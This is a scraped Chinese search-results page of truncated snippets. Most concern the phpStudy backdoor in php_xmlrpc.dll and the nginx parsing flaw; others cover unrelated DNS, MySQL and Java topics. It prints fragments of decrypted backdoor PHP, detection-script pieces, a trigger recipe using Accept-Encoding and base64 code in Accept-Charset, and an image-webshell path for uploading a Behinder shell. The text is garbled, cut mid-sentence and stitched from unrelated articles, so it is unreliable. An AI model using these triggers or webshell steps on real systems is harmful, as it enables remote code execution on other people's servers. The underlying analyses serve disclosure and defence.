漏洞第一时间了解 点击蓝字 · 关注我们 01 前言 phpstudy(小皮模板存在nginx解析漏洞[phpstudy莫名的就背锅了) 影响版本 phptsuy8.1.07的Nginx1.5.11...版本 02 简介 phpstudy(小皮面板) 简介: phpStudy国内12年老牌公益软件,集安全,高效,功能与一体,已获得全球用户认可安装,运维也高效。...03 漏洞复现 0x01 测试环境: Winodws server 2012 Phpstudy(小皮版本) 8.1.0.7 Nginx 1.15.11 Php 7.3.4 ?...04 漏洞原因 phpstudy 采用了符合漏洞范围版本的nginx nginx漏洞影响范围 Nginx 0.8.41~1.4.3 / 1.5.0~1.5.7 1、由于nginx.conf的如下配置导致...首先这个洞属于nginx解析漏洞,其实很早之前就已经有了,只不过phpstudy nginx环境 使用了较低的nginx版本,所以存在漏洞. 3.这个洞只有PHPSTUDY有吗?
phpstudy中mysql升级后MySQL服务无法启动 问题产生: 安装好phpstudy后,升级了MySQL后,通过phpstudy启动,Apache可以启动,Mysql无法启动。...步骤: 一、备份原来 phpStudy 中 MySQL 安装目录 二、把下载的 MySQL 压缩文件解压至 phpStudy 下的 MySQL目录,复制 my-default.ini ,重命名为 my.ini...打开 my.ini,找到 #basedir 处编辑: basedir=D:/phpStudy/MySQL datadir=D:/phpStudy/MySQL/data 三、把 MySQL 安装路径添加至系统环境变量...四、在 cmd 下进入 MySQL 的 bin 目录(我的是 D:/phpStudy/MySQL/bin),执行: mysqld –initialize 初始化数据库 五、安装服务: mysqld -
注意这个网址栏,就是lan加端口号,这样大大的方便了我们平时在本地的测试,不需要再输入一长串的127.0.0.1之类的,也比localhost要短对不,更主要的...
DNS的重要性与作用 DNS 被誉为互联网的“电话簿”,虽然在用户使用互联网的过程中并不直接感知它的存在,但它却承担了至关重要的任务: 2.1 地址解析与负载均衡 DNS 在将域名解析为 IP 地址的同时...,也能通过域名解析实现负载均衡。...2.3 安全性与防护 DNS 也涉及到网络安全。域名劫持、DNS 缓存投毒等攻击方式都与 DNS 直接相关。通过使用安全 DNS 服务和相关的安全协议,可以提高网络的安全性,防范恶意攻击。 3....它通过数字签名来验证域名解析是否来自授权的源。 新的顶级域名(TLDs): ICANN(互联网名称与数字地址分配机构)逐渐引入新的顶级域名,以满足不断增长的互联网需求。...挑战: DNS污染: 恶意行为者可能会尝试篡改DNS查询结果,引导用户到恶意站点,这被称为DNS污染。
用PhpStudy的Web狗还挺多的,曾经我还是Web狗的时候也用过几天,不过因为不习惯就卸了。...还记得当初会用PhpStudy的原因是在网上自学一些Web方向的课程时,那些课程中就是使用PhpStudy。在拿到样本后,我就对PhpStudy中的后门进行了一波逆向分析。...*)(*v20 + 4 * executor_globals_id - 4) + 296) = v19; return result; } 从unk_1000D66C到unk...10012AA0 < 0 ) ftime(&dword_10012AA0); 当请求头里面不含有Accept-Encoding字段,并且时间戳满足一定条件后,会执行asc_1000D028到unk...,却发现不存在后门: phpStudy20161103.zip压缩包md5:5bf5f785f027bf0c99cd02692cf7c322 phpStudy20161103.exe md5码:
自动更新DNS解析 到本机IP地址,支持 ipv4和ipv6 以 本地(内网)IP 和 公网IP。 代理模式,支持自动创建域名记录。
复现环境 phpstudy2016 +win10 复现过程 启动有漏洞的phpstudy pcat的检测脚本如下 python版本: # -*- coding:utf8 -*- __author__='...dirs: pcheck(os.path.join(path, name)) pass if __name__ == '__main__': foo() 放在phpstudy...5.4.45\ext\php_xmlrpc.dll === @eval(%s('%s')); %s;@eval(%s('%s')); [Finished in 10.2s] 可以发现 主要是这两个版本的phpstudy...Administrator" or "DefaultAccount" in r.text: # # print(r.text) # else: # print("不存在phpstudy...后门") # if len(sys.argv) < 2: # print("python phpstudy.py http://127.0.0.1") # else: # Poc(sys.argv
在购买了域名之后,首先要做的就是域名解析,在进行域名解析后,才能够有效建立域名和ip之间的稳定联系,对于没有经验的使用者来说,一般如何将域名解析到ip呢?在进行域名解析后多久才能生效呢?...一般如何将域名解析到ip 1、想要进行域名解析,首先要知道ip地址,在了解ip地址后,再设置解析记录和解析类型即可。如果不知道ip地址的话,也可以直接咨询服务器的运营商。 2、进行地址管理。...3、进入域名解析的高级页面,并按照系统要求填写域名的相关信息,添加解析类型为A类型,随后保存相关设置。最后只需要耐心等待域名解析生效即可。...在进行域名解析后,可以耐心等待一段时间,并使用ping域名进行检测域名是否已经生效。如果域名超过24小时还未生效的话,可以上网求助或检测原因。...以上为大家介绍了一般如何将域名解析到ip,在购买ip地址和域名之后,应当及时进行解析,避免出现域名失效的情况。如果还是不知道如何将域名解析到ip的话,可以寻求更专业的帮助。
用PhpStudy的Web狗还挺多的,曾经我还是Web狗的时候也用过几天,不过因为不习惯就卸了。...还记得当初会用PhpStudy的原因是在网上自学一些Web方向的课程时,那些课程中就是使用PhpStudy。在拿到样本后,我就对PhpStudy中的后门进行了一波逆向分析。 2....*)(*v20 + 4 * executor_globals_id - 4) + 296) = v19; return result; } 从unk_1000D66C到unk...10012AA0 < 0 ) ftime(&dword_10012AA0); 当请求头里面不含有Accept-Encoding字段,并且时间戳满足一定条件后,会执行asc_1000D028到unk...,却发现不存在后门: phpStudy20161103.zip压缩包md5:5bf5f785f027bf0c99cd02692cf7c322 phpStudy20161103.exe md5码:
0x01:前言 近日,phpStudy被公告疑似遭遇黑客攻击,程序包自带PHP的php_xmlrpc.dll模块隐藏有后门,经网友确认phpStudy2016、phpStudy2018的部分版本有后门...0x02:预防 phpStudy启动时默认加载php-5.4.45版本的PHP,该版本存在后门,可以从PHP官网下载原始php-5.4.45版本或php-5.2.17版本,替换其中的php_xmlrpc.dll
本文为看雪论坛优秀文章 看雪论坛作者ID:lipss PHP环境集成程序包phpStudy被公告疑似遭遇供应链攻击,程序包自带PHP的php_xmlrpc.dll模块隐藏有后门。...影响版本 Phpstudy 2016 php\php-5.2.17\ext\php_xmlrpc.dll php\php-5.4.45\ext\php_xmlrpc.dll Phpstudy 2018...定位特征字符串位置 根据@eval()这个代码执行函数定位到引用位置。@是PHP提供的错误信息屏蔽专用符号。Eval()可执行php代码,中间%s格式符为字符串传参。...分别是从1000D66C到1000E5C4的代码解密: @ini_set("display_errors","0"); error_reporting(0); function tcpGet($sendMsg...从1000D028 到1000D66C的代码解密: @ini_set("display_errors","0"); error_reporting(0); $h = $_SERVER['HTTP_HOST
0x01 漏洞简介 2019年9月20日,网上传出 phpStudy 软件存在后门,随后作者立即发布声明进行澄清,其真实情况是该软件官网于2016年被非法入侵,程序包自带PHP的php_xmlrpc.dll...影响版本: phpStudy2016-php-5.2.17 phpStudy2016-php-5.4.45 phpStudy2018-php-5.2.17 phpStudy2018-php-5.4.45...更多漏洞细节参考文章:PHPStudy后门事件分析 0x02 环境准备 本次漏洞复现的演示靶场为phpStudy 2018中的php-5.2.17+Apache环境 phpStudy 2018 后门版...:点击下载 提取码:nlnq 靶机环境搭建成功后,即可访问phpinfo页面 0x03 漏洞检测 phpStudy的后门问题代码存在于以下路径文件中 # phpStudy2016路径 php\php...BurpSuite-Extender-phpStudy-Backdoor-Scanner:点击下载 插件安装成功后,在每次抓包时就会自动的扫描分析漏洞是否存在,若存在漏洞,则会提示相应的告警信息。
---- 下载和安装 先wget下载 wget -c http://lamp.phpstudy.net/phpstudy.bin 再给对应的权限(自己服务器,暂时自己用,所以暂时744权限) chmod...744 phpstudy.bin (文档上是 chmod +x phpstudy.bin, 自己简单操作) 最后安装 ..../phpstudy.bin 安装的时候,需要选择php版本,以及 服务器类型 ? 自己简单选取 5, a 后 (也就是 5.5, apache) 就自动进行安装了 ?.../phpstudy.bin 但是你会发现有一行是否安装mysql提示 选不安装 这样只需要编译nginx+php5.4 【phpstudy还是蒲老师很早介绍的, 应该有快2年了,感谢:)】 ---...卸载phpstudy的方法 ? 重启 ? vhost添加 ? vhost删除 ?
InetAddress类 import org.testng.annotations.Test; import java.net.InetAddress; i...
请注意:TTL(Time-To-Live)指的是域名解析记录在 DNS 服务器中的存留时间,一般设置为3600。...如果没有错误显示且显示的IP地址是你的云主机 IP,这表明域名解析已成功生效。方法二:使用nslookup命令进行测试nslookup命令可以查询域名解析的详细信息。...打开本地的命令提示符(CMD)界面,在其中输入“nslookup -qt=a + 你的域名”,如果返回的IP地址和设置的域名解析云主机 IP地址一致,则表明域名解析已经生效。...如果找不到IP地址或者回显IP地址不一致,则表明域名解析未生效或设置错误。...请注意:域名解析理论生效时间在半个小时~数小时之间,在完成DNS解析设置后,请耐心等待。最后本文是使用自带的域名解析功能完成域名解析,当然你也可以使用第三方域名解析。
问题概要 有问题的版本如下 phpStudy20180211版本 php5.4.45与php5.2.17 ext扩展文件夹下的php_xmlrpc.dll phpStudy20161103版本 php5.4.45...环境准备 本次使用的是之前下载安装在本地的phpStudy20180211官网版本 官网下载地址 phpStudy 2018版本下载及更新日志 - phpStudy交流社区 https://www.xp.cn
打开站点域名管理 填写站点管理内容,然后点击新增,左侧会增加更才填写的内容,然后点击保存设置并生产配置文件 修改hosts本地映射 Paste_Image.pn...
0x01 漏洞简介 自从2019年phpStudy爆出后门事件后,2020年9月再次爆出存在nginx解析漏洞。该漏洞是phpStudy默认使用的nginx版本是Nginx1.15.11。...影响版本: phpStudy <= 8.1.0.7 (Windows版) 0x02 漏洞原因 1、由于用户的错误配置导致 nginx 把以 .php 结尾的文件交给 fastcgi 处理,为此可以构造...0x03 环境准备 本次复现环境采用Windows版的phpstudy v8.1.0.1 phpstudy v8.1.0.1 点击下载 提取码:y6qt 安装成功后一键启动WNMP即可 0x04 漏洞复现...构造解析后缀访问如下: http://192.168.126.129/3.jpg/xxx.php 在图片马中写入shell,以冰蝎码为例 然后使用冰蝎管理工具进行连接即可 0x05 修复建议 建议升级phpStudy
大家在平时使用互联网的时候接触最多的肯定就是各种网站了,现在社会中各行各业都会建设一个自己的网站,无论是公司企业还是各种购物平台,大家都可以通过网站了解到相关的内容,这也大大方便了人们对于社会的了解。...网站在上线之前是需要进行域名解析的,很多人并不清楚域名解析怎么设置,其实域名解析是需要设置很多方面的内容的,不过设置的方法也比较简单,大家在建设网站域名会在各种服务商上面购买域名,域名解析的设置就在这些服务商网站上面...域名解析如何操作?...对于一个网站来说,只有域名解析到特定的地址之后,用户们才可以正常访问网站的,所以域名解析是非常重要的,在大家购买完域名之后就会弹出解析的按钮,大家可以在购买服务商的网站上面直接解析就可以了,当然也可以借助一些解析工具对域名进行解析...相信大家看了上面的文章内容已经知道域名解析怎么设置了,域名解析这个步骤是非常重要的,只有成功进行域名解析的网站才可以顺利访问,大家一定要耐心操作哦。
作者:lu4nx@知道创宇404积极防御实验室 作者博客:《使用 Ghidra 分析 phpStudy 后门》 原文链接:https://paper.seebug.org/1058/ 这次事件已过去数日...7 虚拟机中安装 PhpStudy 20180211,然后把安装完后的目录拷贝到 Kali Linux 中。...在翻译后的函数 FUN_100031f0 中,我找到了前面搜索到的三个 eval 字符,说明这个函数中可能存在多个后门(当然经过完整分析后存在三个后门)。...到这里,就知道该如何构造 Payload 了: Accept-Encoding: gzip,deflate Accept-Charset: Base64加密后的PHP代码 朝虚拟机构造一个请求: $ curl...《phpStudy 遭黑客入侵植入后门事件披露 | 微步在线报告》 《PhpStudy 后门分析》,作者:Hcamael@知道创宇 404 实验室
领取专属 10元无门槛券
手把手带您无忧上云